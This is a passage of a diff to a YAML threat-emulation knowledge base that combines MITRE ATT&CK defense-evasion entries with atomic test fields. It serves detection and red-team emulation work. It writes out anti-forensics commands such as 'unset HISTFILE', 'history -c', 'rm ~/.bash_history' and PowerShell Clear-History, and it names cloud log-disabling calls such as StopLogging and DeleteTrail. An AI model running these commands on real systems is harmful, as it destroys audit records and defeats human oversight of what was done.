in different sessions. + On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. - Adversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history. + Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. + + On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. + + The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History) + + Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) id: attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T21:31:03.043Z' + modified: '2020-10-16T18:09:48.686Z' created: '2020-01-31T12:32:08.228Z' - x_mitre_version: '1.0' + x_mitre_contributors: + - Vikas Singh, Sophos + - Emile Kenning, Sophos + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User x_mitre_defense_bypassed: - Host forensic analysis - Log analysis - x_mitre_detection: User authentication, especially via remote terminal services - like SSH, without new entries in that user's ~/.bash_history - is suspicious. Additionally, the modification of the HISTFILE - and HISTFILESIZE environment variables or the removal/clearing - of the ~/.bash_history file are indicators of suspicious activity. + x_mitre_detection: |- + User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity. + + Monitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command. x_mitre_data_sources: + - Process command-line parameters + - PowerShell logs - File monitoring - Authentication logs x_mitre_platforms: - Linux - macOS + - Windows identifier: T1070.003 atomic_tests: - name: Clear Bash history (rm) @@ -23202,6 +26847,15 @@ defense-evasion: elevation_required: true T1078.004: technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.004 @@ -23218,15 +26872,6 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs description: Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cloud Accounts - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -23237,21 +26882,8 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:59:36.729Z' + modified: '2020-10-19T16:01:22.090Z' created: '2020-03-13T20:36:57.378Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal - or malicious activity, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs x_mitre_platforms: - AWS - GCP @@ -23259,32 +26891,22 @@ defense-evasion: - SaaS - Azure AD - Office 365 + x_mitre_data_sources: + - Azure activity logs + - Authentication logs + - AWS CloudTrail logs + - Stackdriver logs + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1553.002: technique: - created: '2020-02-05T16:27:37.784Z' - modified: '2020-02-10T19:51:01.601Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082 - description: "Adversaries may create, acquire, or steal code signing materials - to sign their malware or tools. Code signing provides a level of authenticity - on a binary from the developer and a guarantee that the binary has not been - tampered with. (Citation: Wikipedia Code Signing) The certificates used during - an operation may be created, acquired, or stolen by the adversary. (Citation: - Securelist Digital Certificates) (Citation: Symantec Digital Certificates) - Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), - this activity will result in a valid signature.\n\nCode signing to verify - software on first run can be used on modern Windows and macOS/OS X systems. - It is not used on Linux due to the decentralized nature of the platform. (Citation: - Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass - security policies that require signed code to execute on a system. " - name: Code Signing - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1553.002 @@ -23301,18 +26923,41 @@ defense-evasion: description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. source_name: Symantec Digital Certificates - x_mitre_platforms: - - macOS - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Code Signing + description: "Adversaries may create, acquire, or steal code signing materials + to sign their malware or tools. Code signing provides a level of authenticity + on a binary from the developer and a guarantee that the binary has not been + tampered with. (Citation: Wikipedia Code Signing) The certificates used during + an operation may be created, acquired, or stolen by the adversary. (Citation: + Securelist Digital Certificates) (Citation: Symantec Digital Certificates) + Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), + this activity will result in a valid signature.\n\nCode signing to verify + software on first run can be used on modern Windows and macOS/OS X systems. + It is not used on Linux due to the decentralized nature of the platform. (Citation: + Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass + security policies that require signed code to execute on a system. " + id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-02-10T19:51:01.601Z' + created: '2020-02-05T16:27:37.784Z' + x_mitre_data_sources: + - Binary file metadata + x_mitre_defense_bypassed: + - Windows User Account Control x_mitre_detection: Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. - x_mitre_defense_bypassed: - - Windows User Account Control - x_mitre_data_sources: - - Binary file metadata + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - macOS + - Windows atomic_tests: [] T1027.004: technique: @@ -23723,6 +27368,23 @@ defense-evasion: name: powershell T1542.002: technique: + created: '2019-12-19T20:21:21.669Z' + modified: '2020-03-23T23:48:33.904Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 + description: |- + Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. + + Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. + name: Component Firmware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1542.002 @@ -23738,54 +27400,39 @@ defense-evasion: health and make sure it's not already dying on you. Retrieved October 2, 2018. source_name: ITWorld Hard Disk Health Dec 2014 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Component Firmware - description: |- - Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. - - Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. - id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-23T23:48:33.904Z' - created: '2019-12-19T20:21:21.669Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Ability to update component device firmware from the host operating system. - x_mitre_permissions_required: - - SYSTEM - x_mitre_defense_bypassed: - - Anti-virus - - Host intrusion prevention systems - - File monitoring - x_mitre_detection: |- - Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. - - Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. + x_mitre_platforms: + - Windows x_mitre_data_sources: - Component firmware - Process monitoring - Disk forensics - API monitoring - x_mitre_platforms: - - Windows + x_mitre_detection: |- + Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. + + Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. + x_mitre_defense_bypassed: + - Anti-virus + - Host intrusion prevention systems + - File monitoring + x_mitre_permissions_required: + - SYSTEM + x_mitre_system_requirements: + - Ability to update component device firmware from the host operating system. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1218.002: technique: id: attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f description: |- - Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) + Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. - For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL) + Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) - Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. + Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. + + Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020) name: Control Panel created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -23794,10 +27441,10 @@ defense-evasion: - source_name: mitre-attack external_id: T1218.002 url: https://attack.mitre.org/techniques/T1218/002 - - url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx + - source_name: Microsoft Implementing CPL description: M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018. - source_name: Microsoft Implementing CPL + url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx - url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf description: Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018. @@ -23810,12 +27457,18 @@ defense-evasion: description: Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017. source_name: Palo Alto Reaver Nov 2017 + - source_name: ESET InvisiMole June 2020 + url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf + description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE + HIDDEN PART OF THE STORY. Retrieved July 16, 2020.' type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:33:18.929Z' + modified: '2020-10-21T18:37:11.672Z' created: '2020-01-23T19:59:52.630Z' + x_mitre_contributors: + - ESET x_mitre_platforms: - Windows x_mitre_data_sources: @@ -23826,15 +27479,15 @@ defense-evasion: - Binary file metadata - API monitoring x_mitre_detection: |- - Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014) + Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014) Inventory Control Panel items to locate unregistered and potentially malicious files present on systems: * Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace and HKEY_CLASSES_ROOT\CLSID\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL) - * CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL) - * Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL) + * CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL) + * Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL) - Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014) + Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014) x_mitre_defense_bypassed: - Application control x_mitre_permissions_required: @@ -23842,7 +27495,7 @@ defense-evasion: - Administrator - SYSTEM x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1218.002 atomic_tests: - name: Control Panel Items @@ -23890,8 +27543,8 @@ defense-evasion: url: https://attack.mitre.org/techniques/T1578/002 - source_name: Mandiant M-Trends 2020 url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 - description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved - April 24, 2020. + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. - source_name: AWS CloudTrail Search url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. @@ -23907,7 +27560,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-18T11:45:36.417Z' + modified: '2020-09-14T19:48:08.299Z' created: '2020-05-14T14:45:15.978Z' x_mitre_platforms: - AWS @@ -23984,8 +27637,8 @@ defense-evasion: url: https://attack.mitre.org/techniques/T1578/001 - source_name: Mandiant M-Trends 2020 url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 - description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved - April 24, 2020. + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. - source_name: AWS Cloud Trail Backup API url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. @@ -24014,7 +27667,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-19T14:45:59.618Z' + modified: '2020-09-14T19:48:08.293Z' created: '2020-06-09T15:33:13.563Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -24142,9 +27795,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1574.002 url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-capec + - external_id: CAPEC-641 source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html + url: https://capec.mitre.org/data/definitions/641.html - source_name: About Side by Side Assemblies url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved @@ -24172,7 +27825,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:05:42.513Z' + modified: '2020-10-17T15:15:27.807Z' created: '2020-03-13T19:41:37.908Z' x_mitre_defense_bypassed: - Anti-virus @@ -24231,6 +27884,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1078.001 url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html - source_name: Microsoft Local Accounts Feb 2019 url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February @@ -24257,9 +27913,9 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:37:34.567Z' + modified: '2020-09-16T19:41:43.491Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -24316,8 +27972,8 @@ defense-evasion: url: https://attack.mitre.org/techniques/T1578/003 - source_name: Mandiant M-Trends 2020 url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 - description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved - April 24, 2020. + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. - source_name: AWS CloudTrail Search url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. @@ -24342,7 +27998,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-17T19:53:14.784Z' + modified: '2020-09-14T19:55:23.113Z' created: '2020-06-16T17:23:06.508Z' x_mitre_detection: |- The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity. @@ -24541,6 +28197,115 @@ defense-evasion: Format-Hex -InputObject $buffer name: powershell elevation_required: true + T1562.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1562.008 + url: https://attack.mitre.org/techniques/T1562/008 + - source_name: 'Following the CloudTrail: Generating strong AWS security signals + with Sumo Logic' + url: https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/ + description: 'Dan Whalen. (2019, September 10). Following the CloudTrail: + Generating strong AWS security signals with Sumo Logic. Retrieved October + 16, 2020.' + - source_name: Stopping CloudTrail from Sending Events to CloudWatch Logs + url: https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html + description: Amazon Web Services. (n.d.). Stopping CloudTrail from Sending + Events to CloudWatch Logs. Retrieved October 16, 2020. + - source_name: Configuring Data Access audit logs + url: https://cloud.google.com/logging/docs/audit/configure-data-access + description: Google. (n.d.). Configuring Data Access audit logs. Retrieved + October 16, 2020. + - source_name: az monitor diagnostic-settings + url: https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete + description: Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved + October 16, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Disable Cloud Logs + description: "An adversary may disable cloud logging capabilities and integrations + to limit what data is collected on their activities and avoid detection. \n\nCloud + environments allow for collection and analysis of audit and application logs + that provide insight into what activities a user does within the environment. + If an attacker has sufficient permissions, they can disable logging to avoid + detection of their activities. For example, in AWS an adversary may disable + CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: + Following the CloudTrail: Generating strong AWS security signals with Sumo + Logic)" + id: attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-19T16:31:34.489Z' + created: '2020-10-12T13:52:32.846Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor + for: StopLogging and DeleteTrail.(Citation: Stopping + CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: + Configuring Data Access audit logs) In Azure, monitor for az monitor + diagnostic-settings delete.(Citation: az monitor diagnostic-settings) + Additionally, a sudden loss of a log source may indicate that it has been + disabled.' + x_mitre_data_sources: + - AWS CloudTrail logs + - Azure activity logs + - GCP audit logs + x_mitre_contributors: + - Ibrahim Ali Khan + - AttackIQ + - Janantha Marasinghe + - 'Sekhar Sarukkai; Prasad Somasamudram; Syed Ummar Farooqh (McAfee) ' + - Matt Snyder, VMware + x_mitre_platforms: + - GCP + - Azure + - AWS + atomic_tests: [] + T1600.002: + technique: + id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5 + description: |- + Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data. + + Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks) + name: Disable Crypto Hardware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1600.002 + url: https://attack.mitre.org/techniques/T1600/002 + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-21T22:37:48.503Z' + created: '2020-10-19T19:11:18.757Z' + x_mitre_data_sources: + - File monitoring + x_mitre_platforms: + - Network + x_mitre_detection: There is no documented method for defenders to directly identify + behaviors that disable cryptographic hardware. Detection efforts may be focused + on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) + and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some + detection methods require vendor support to aid in investigation. + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] T1562.002: technique: external_references: @@ -24632,8 +28397,8 @@ defense-evasion: url: 